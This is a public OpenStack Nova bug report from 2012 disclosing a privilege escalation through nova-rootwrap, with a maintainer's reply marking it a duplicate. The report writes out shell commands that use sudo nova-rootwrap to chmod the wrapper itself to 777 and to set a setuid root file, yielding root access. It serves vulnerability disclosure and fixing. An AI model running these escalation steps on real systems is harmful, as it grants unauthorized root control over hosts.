OpenStack Compute (nova)

privilege escalation thru nova-rootwrap

Bug #1092491 reported by Nikita Savin on 2012-12-20

This bug report is a duplicate of: Bug #948520: nova-rootwrap does a poor job of validating parameters. Edit Remove

This bug affects 2 people

Affects		Status	Importance	Assigned to	Milestone
	OpenStack Compute (nova)	Incomplete	Undecided	Unassigned

Bug Description

bash-4.1$ id
uid=162(nova) gid=162(nova) groups=162(nova),99(nobody),107(qemu),488(fuse)bash-4.1$ sudo /usr/bin/nova-rootwrap chmod 777 /usr/bin/nova-rootwrap
bash-4.1$ ls /usr/bin/nova-rootwrap -l
-rwxrwxrwx 1 root root 2674 Dec 20 08:27 /usr/bin/nova-rootwrap

After this attacker can change nova-rootwrap content and run any command with root privileges

Possible way to fix this issue is to limit paths on which chmod can be used.
(but there will be several more issues - fro example,
touch /var/lib/nova/smth
sudo nova-rootwrap chown root /var/lib/nova/smth
sudo nova-rootwrap chmod +s /var/lib/nova/smth)

Please let me know if you want me to provide patches for issues I see with nova-rootwrap

Revision history for this message

Thierry Carrez (ttx) wrote on 2012-12-20:

Yes, it's a well-known issue that some filters are way too permissive for successful isolation if you use them (chown, chmod, dd come too mind). ideally we would get rid of chmod/chown/dd usage in Nova completely. In the mean time, using RegExpFilter instead of CommandFilter could help.

This is mostly the same as https://bugs.launchpad.net/nova/+bug/948520, so I suggest we just mark this one a duplicate of it.

Changed in nova:
status:	New → Incomplete

Thierry Carrez (ttx) on 2012-12-21

information type:

Private Security → Public

Report a bug

This report contains Public information

Everyone can see this information.

Duplicate of bug #948520 Remove

You are

Subscribing...

Edit bug mail

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.